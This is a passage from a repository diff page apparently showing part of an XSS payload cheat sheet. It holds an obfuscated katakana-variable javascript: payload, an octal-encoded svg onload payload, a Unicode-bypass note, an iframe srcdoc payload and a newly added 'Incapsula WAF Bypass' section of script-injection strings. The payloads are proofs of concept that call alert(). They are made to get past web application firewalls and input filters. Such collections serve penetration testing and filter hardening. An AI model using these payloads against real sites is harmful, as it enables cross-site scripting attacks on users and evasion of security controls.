javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
|
||||
```
|
||||
|
||||
Bypass using Octal encoding
|
||||
```
|
||||
javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76'
|
||||
```
|
||||
|
||||
|
||||
Bypass using Unicode
|
||||
```
|
||||
Unicode character U+FF1C FULLWIDTH LESSTHAN SIGN (encoded as %EF%BC%9C) was
|
||||
@ -672,6 +710,12 @@ Exotic payloads
|
||||
<iframe src=""/srcdoc='<svg onload=alert(1)>'>
|
||||
```
|
||||
|
||||
## Incapsula WAF Bypass - 8th march
|
||||
```
|
||||
anythinglr00</script><script>alert(document.domain)</script>uxldz
|
||||
|
||||
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
|
||||
```
|
||||
|
||||
## More fun ?
|
||||
This section will be used for the "fun/interesting/useless" stuff.
|
||||
|
Loading…
Reference in New Issue
Block a user